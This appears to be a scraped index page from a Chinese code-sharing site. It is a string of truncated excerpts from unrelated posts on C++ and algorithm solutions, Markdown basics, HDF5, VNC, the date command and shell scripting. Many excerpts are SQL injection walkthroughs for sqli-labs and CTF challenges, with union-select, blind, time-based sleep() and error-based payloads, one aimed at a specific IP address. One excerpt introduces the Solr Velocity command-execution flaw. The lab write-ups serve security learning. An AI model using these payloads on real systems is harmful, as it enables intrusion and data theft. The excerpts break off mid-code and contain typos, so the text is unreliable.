ICode9

题目传送门 #include <bits/stdc++.h> using namespace std; typedef long long LL; LL a, b, c; LL gcd(LL x, LL y) { return y ? gcd(y, x % y) : x; } LL lcm(LL x, LL y) { return x * y / gcd(x, y); } int main() { cin >> a >> b >&g

1.数据溢出 2.xpath语法错误 3.concat+rand()+group by 主键重复报错 4.几何函数   1.数据 exp()函数:此函数返回e(自然对数的底)指数X的幂值  ，select 查询成功返回0， ~0=1111111111111111 mysql> select exp(~(select*from(select user())x)); ERROR 1690 (22003): DOUBLE valu

Boolean盲注（在输入id=1的情况下只返回yes或no就需要考虑是否是boolean类型） 判断数据库长度名 ?id=1' and length(database())>=5 --+　　　　//字符型，length函数查询database数据库长度是否大于5，大于5则返回和id=1一样的结果 通过工具爆破数据库名(采用bp工具进行爆破) ?id=1' and

爆库名 ?id=1' and if(ascii(substr(database(),1,1))>9,sleep(6),1)%23　　　　//在MySQL中有两种注释方法”#“和”--+“,采用if语句判断数据库名的长度，如果数据库长度大于9，则延迟6秒传输 通过工具爆破表名(采用bp工具进行爆破) ?id=1' and if(asscii(substr((select table_name

Markdown 标题 一个#+空格 一级标题 两个#+空格 二级标题 。。。。 最多六个#+空格 六级标题 字体 一个✳在文字两侧，字体会倾斜 两个✳在文字两侧，字体会加粗 三个✳在文字两侧，字体会倾斜加粗 两个波浪号在文字两侧，文字会被显示划去 引用 一个大于符合加空格就出现 分割线 三个

判断注入点类型 1 显示 1' 不显示 2' and '1'='1 显示2的结果,单引号无括号 判断字段数 1' order by 5--+ 不显示 1' order by 4--+显示,字段数为4 判断可用字段 -1' union select 1,2,3,4--+ 获取数据库 获取表名 id=-1' union select 1,(select group_concat(table_name) fro

Markdown学习 标题： #+空格（二级标题两个#+空格，以此类推） 二级标题 三级标题 四级标题   字体 Hello,World! Hello,World! Hello,World! Hello,World!   引用 选择狂神说java，走向人生巅峰   分割线   图片       超链接 点击跳转到百度   列表 A B C A B

58 5步内获得flag-报错注入-单引号 5步内获取flag?有点太高估我的能力了吧

Mysql获取Employees中的first_name，按照最后两个字母排列 题目描述： 获取Employees中的first_name，查询按照first_name最后两个字母，按照升序进行排列 运用到的知识点： select xxx from 表名order byRight(列名,数字) select first_name from enployees order by RIGHT(first_nam

题目链接 题链 题解 区间众数的个数 \(>\) 区间长度一半 称这个区间有主元素，主元素就是这个众数； 题意：求数组中有多少个区间有主元素; 考虑一个子问题：每一种数作为主元素的贡献； 例如给定数组 \(p = [3,2,1,3,3,2]\)，并考虑 \(3\) 作为主元素的贡献； 我们可以将是数字 \(3\) 的记为 \(

传送 这题比赛的时候考了原题，顾子哥推了出来一个挺复杂的线段树，没想到竟然是正解。 我们枚举大小为\(x\)的数，那么如果在区间\([L, R]\)中，\(x\)符合题目的条件，记\(num[i]\)为\(1\)到\(i\)中\(x\)的出现次数，那么有\(\frac{num[R] - num[L - 1]}{R - L + 1} > \frac1{2}\)，整理得$$2

为什么最劣解选手还有脸来写题解啊…… 这题首先考虑每个数 \(x(1\leq x\leq n)\)​​​​ 分开算贡献。设 \(B_1,B_2,\cdots,B_{m_x}(A_{B_i}=x)\)​​​​。我们发现对于每个数分开计算是，\(A_1,A_2,\cdots,A_n\)​​​​ 只有两种数，一种是等于 \(x\)​​​，另一种是不等于 \(x\)

前言： wifi 状态灯在嵌入式项目中很常见，同过状态灯可以判断wifi是否正常工作，不同的led status，可以表示数据发，收等。在nxp项目中，用到的是bcm43455 wifi （博通ap6255），需要增加一个led灯来表示wifi是否正常工作。有以下方案： 方案一：bcm43xx ap硬件有先关的led-gpio，由硬件来完成 方

题目上来是买flag的，一开始我真的以为买flag给flag，联想到了逻辑漏洞，但是测试后发现线程十分安全(一旦多了就自断请求失败！)，直接又通过url联想到了flask的SSTI，但是测试了后username参数过滤很严格，emmm陷入了沉思 直到Hint放出来才知道是SQL注入，az！ CREATE TABLE "users" ( "id" INTE

漏洞简介 在其 5.0.0 到 8.3.1版本中，用户可以注入自定义模板，通过Velocity模板语言执行任意命令。 漏洞复现 默认情况下params.resource.loader.enabled配置未打开，无法使用自定义模板。我们先通过如下API获取所有的核心： http://your-ip:8983/solr/admin/cores?indexInfo=false

#mysql简要注入流程 mysql注入简要流程如下图：    由于还没学习完先结合sqlilabs的第一关讲解信息收集的一部分和数据注入的information_schema的有据查询。 #sqli-labs之Less-1 1.判断是否有注入点 老方法： and 1=1 页面正常 and 1=2 页面错误 说明可能存在注入点 最舒服的方法：

Less-1 测试是字符型还是数字型 判断所在字段数 查看显示值 可以看出显示2,3位置。因此我们选择2的位置进行联合注入 查看表名 我们要对admin，users等字符敏感 查看admin表中的字段名 显示内容 获得flag：helloword less-1的代码 Less-2 判断字符型注入还

标题 1#+空格 +标题名字=一级标题 2#+空格 +标题名字=二级标题 3#+空格 +标题名字=三级标题 4#+空格 +标题名字=四级标题 最多支持六级标题 字体 hello world！ 左右加**为加粗 hello world！ 左右加*为斜体 hello world！ 左右加***为斜体加粗 hello world！ 左右加~~为删除线 引用

HDF5 简介 HDF（Hierarchical Data Format）指一种为存储和处理大容量科学数据设计的文件格式及相应库文件。HDF 最早由美国国家超级计算应用中心 NCSA 开发，目前在非盈利组织 HDF 小组维护下继续发展。当前流行的版本是 HDF5。HDF5 拥有一系列的优异特性，使其特别适合进行大量科学数据

#+title: VNC #+author: susu #+STARTUP: indent vnc #+BEGIN_SRC shell # for rhel yum install tigervnc-server rpm -ql tigervnc-server vncserver vncserver -list vncserver -kill :x #+END_SRC Reference [[https://www.cnblogs.com/5201351/p/4227198.html][linu

1.寻找注入点                 当我们闭合了第一个参数后有明显的报错信息，我们就可以考虑基于报错的注入了         http://219.153.49.228:41801/new_list.php?id=1’          2.报错注入-报错回显         参考：https://www.jianshu.com/p/b

Less-1 Error Based- String 打开页面,提示用id作为变量 打开hackbar,构造?id=1看看 ?id=1 and 1=2#和?id=1 and 1=1#均正确执行,说明不是数字型注入 加个'报错,看来是字符型注入了,也可以用报错注入 字符型注入 用#注释结果报错,看来#被过滤了 换成--+成功返回页面 查询字

date命令 date - print or set the system date and time。即，打印或设置系统日期和时间。 date的用法： date [OPTION]... [+FORMAT] date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]] 实例1，打印今天的日期的两种格式 [zhangchuangfei@localhost ~]$ date +%F 2021-07-

一进来看到一个停机公告，点开查看 发现链接中有字符参数，怀疑存在字符型注入 输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1 ' and '1'='2 发现当输入 'and '1'='2 时，网页发生了错误，确认存在注入。 通过order by

#!/bin/sh source ~/.bash_profile; source /etc/profile; start_date="20190622" end_date="20190625" while [ "$start_date" -le "$end_date" ]; do yestertoday=`date -d "$start_date" +%Y-%m-%d` today=`date -d